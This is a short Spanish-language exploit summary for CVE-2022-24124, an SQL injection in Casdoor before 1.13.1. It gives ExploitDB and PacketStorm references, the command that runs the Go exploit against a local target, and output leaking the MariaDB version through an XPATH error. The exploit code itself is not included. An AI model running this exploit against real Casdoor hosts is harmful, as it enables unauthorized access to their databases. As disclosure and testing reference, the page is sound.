
Volcar la versión de la base de datos SQL en el host que ejecuta Casdoor < 1.13.1
Código de Exploit para CVE-2022-24124 también conocido como Casdoor SQL Injection
Enlaces del Exploit: [ExploitDB-50792] [PacketStormSecurity]
Resultado esperado: Volcar la versión de la base de datos SQL en el host que ejecuta Casdoor < 1.13.1
Destinado únicamente para fines educativos y pruebas en entornos corporativos.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- por Mayank Deshmukh (ColdFusionX)
[*] Volcando la versión de la base de datos
XPATH syntax error: .12-MariaDB-0+deb11u1